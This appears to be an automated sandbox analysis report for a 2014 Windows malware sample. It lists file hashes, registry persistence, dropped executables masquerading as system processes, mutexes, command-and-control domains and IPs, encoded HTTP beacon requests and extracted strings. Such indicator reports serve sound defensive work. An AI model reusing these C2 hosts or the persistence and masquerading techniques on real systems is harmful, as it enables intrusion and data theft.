Analysis Date2014-06-20 14:29:57
MD583a0483ee4b4bb502daa8df99cb45bb2
SHA16b57fbc61d5ce270ecd13b8f15c51503170bcae6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 58b5c4ee9373586bc466c810cc90e32b sha1: c1793f07490e2783d72e5d59ac12945508fe0615 size: 100864
Section.rdata md5: 0c96a3b2073b7f516581d0ec78b97550 sha1: 10ffb165993d8a02ea44ffbd8e172627afbfce8b size: 1024
Section.data md5: 7a63e28c9a078e666d11bdf0b60be715 sha1: cc8e195de8e20d42cd692398884ae3ae0ffdfa2e size: 61952
Section.imul md5: f27d08286ca64a3de491734dd83ccde9 sha1: e01ba584c9be1ea3a84bcb046a03067238babd44 size: 1024
Timestamp2005-08-28 14:44:38
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1065
PEhash616a11e3029042b5508454755c14ffecfa2afe13
IMPhash389272e6c856baf046822db9ebfdde47

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdoublemouseklick.com
Winsock DNSgreenherbalteaonline.com
Winsock DNS127.0.0.1
Winsock DNSfreecdvideo.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSgreenherbalteaonline.com
Type: A
208.73.211.237
DNSgreenherbalteaonline.com
Type: A
208.73.211.240
DNSgreenherbalteaonline.com
Type: A
208.73.211.250
DNSgreenherbalteaonline.com
Type: A
208.73.210.210
DNSgreenherbalteaonline.com
Type: A
208.73.211.179
DNSzonetf.com
Type: A
208.73.210.205
DNSzonetf.com
Type: A
208.73.210.203
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.246
DNSzonetf.com
Type: A
208.73.211.173
DNSzonetf.com
Type: A
208.73.211.173
DNSzonetf.com
Type: A
208.73.210.205
DNSzonetf.com
Type: A
208.73.210.203
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.246
DNSfreecdvideo.com
Type: A
DNSdoublemouseklick.com
Type: A
HTTP GEThttp://greenherbalteaonline.com/images/greenherbalteagirlholdingcup350.gif?v99=53&tq=gKZEtzyTX2FE1HRm9ihLIPyQSoG9QdZtE6XvOtMrFDcJGy0OMcAJBSftUXU%2FMn%2Bzc4KR3Anel365XeTD4AgCE4hIdzcPc3SollxV%2B7LzhcHcPUXLoXqB5JioVEI2nV%2FVGH2BKlixe6s5XbmvEnENHOJWjQ%2F8VHrCooAeEGThHXPZW7q326XtWO%2BavhppPXA2yP3zTmGLB9aF19KqjYMqPRp8i%2BuF9Nk7NFDKgOj330zDcotS2HJMafyEkw2XHvBXhRMpSFSsPCEbyE91UR4beBB5c9poTH%2BTV76ZSU7zxxzXgahco%2BAeE%2B%2BkzwvAMcD3SL1iICGUGJq%2BNwBPYUIfzfRNQOwnY34L%2FKmMbXbX2QQXiRFVMd6kUri8chVlffFXF%2Fzf0biEoQMrGCV4tg92PqZ5%2FwEBKcSiLyFi6XEjFQICiNZ%2Bjm5dLkfLgDmFB2H16sFeWSn70Zrjd55wV2Wgwia8njk3r2MY60ZcvU1VeydYgOdWsY8
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNzVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 208.73.211.237:80
Flows TCP192.168.1.1:1033 ➝ 208.73.210.205:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.173:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.173:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.173:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.173:80
Flows TCP192.168.1.1:1038 ➝ 208.73.211.173:80
Flows TCP192.168.1.1:1039 ➝ 208.73.211.173:80

Raw Pcap

Strings
.b..l...
3. z..
.U
.;...L1
)_g
..
.
'.....$
kz
..
4.T...NmSFe.......5(r.z.
g.}+.
T#.K.....e....
....
...Z.}....
Q
.
F:
.d

040904b0
1.0.0.3
1065
210R
&"A%
%BQ&F
Br'&
B&S&
`!D@
E1cG
E2S`
FileVersion
%f' P
Gp1 
PCGCQ
p#'F
PrivateBuild
ProductVersion
q&CP
S3s"2
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0;A`!C
0`p*(B
`0W=|]
1Vs?D&D
2NQ<3g
,4Ub,X
_6Kua+
6o0=vZ
"6[!$S@
6]s77+
7%2TSZa
7<dC|6
 !)8)4G
8eqgPX!	r
.8h#TK
 8)=ZI
9w1h7)
`A/!1T
aIN+/'
`Aq`$,d3
B:1D6j
bmi$=#N^
BU(fof
bZl1t" 
\c#EV?
ckuQ@l
CompareStringA
@.data
d@}kyC.
e1tn-D
E"!Bj	
e-&Jsto
eNJyWM
EnumResourceNamesW
ERfGv#:
.\E%w0kU;
ExcludeUpdateRgn
FBt^h\3
fEey(J
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileW
FindNextFileW
FindResourceW
fm3v=PU
FreeLibrary
f^sRJ1
~FvvF	
]fYl'E%*
;_}#GD
GetCapture
GetLocalTime
GetShortPathNameW
GetStringTypeW
GetUpdateRgn
GetVDMCurrentDirectories
GetWindowInfo
GoPn@/]
/gSG>Nn
h(4Yr\
H(a]#:1F
HeapCreate
,h':eB
)H/HOH
I6o9]h
I}$*;Gt
ikOht 
\i;l> 
InvalidateRgn
IWnHqI
i)Y_SXa
iytFCC
J:aVgz
_jc77'
jMzrb-?
Jn(l<z
KERNEL32.dll
Kj/f<s7 3
k<-N_c
K|=ngJ
`kW9g%
l.jX{v
LoadResource
LocalFileTimeToFileTime
)LuT;P
LXSWHg
LzA<Bv
m=68UE
-m>kiy
`MqPu V
m;T%YJ
n0Y)OI
NbKl?v
NzOxZ;D
oEk)@^
oRU8#	
OWs!Z 
.oXG=|lh
P9-]qh
pAGcvS
+PdqF x
 ./pga
-PI%3[=
PI`lGV
P;%nUiO
p)#VOB
QE}&F;
(qnEUE
,/qO`E
.RA@M\
`.rdata
$RD)Ua
RegisterWaitForSingleObject
ReleaseCapture
@r%gw?
Rich`x
'r)=vqn
^S'aP^
SearchPathW
SetCapture
SetCurrentDirectoryW
SetEnvironmentVariableW
SetErrorMode
SetThreadPriorityBoost
sm}YvO
sNam&{*
sS	zbe
}sX5Q/{"Z
>s	y5M
SystemTimeToFileTime
t5l@	vRqN
tcy+!<
!This program cannot be run in DOS mode.
<tiI;6
.)?Tj*
T*s*mf
}TSn*[,e
"TTc'v
tY*VM'3g
$TZz|J
U_~8vX
UfGY[V
.uG`l!
uiuOMt.JX
u_<,-OQ
uP^<(Z
uRybUlt
USER32.dll
V0XfjU
ValidateRect
ValidateRgn
vAn|21
{VCMXVg
/v,/*P
+ |,@W9\
WfCHCw
XB@-Le
x^mfe,G
/,xryF
XsHyx!
Y5mm2k
Yh		<B
Y:Qo@@f
YsOyHb
,}:zbc
ZIJYgv
ZiUh!k
-Z#;&J
zl9\mR;i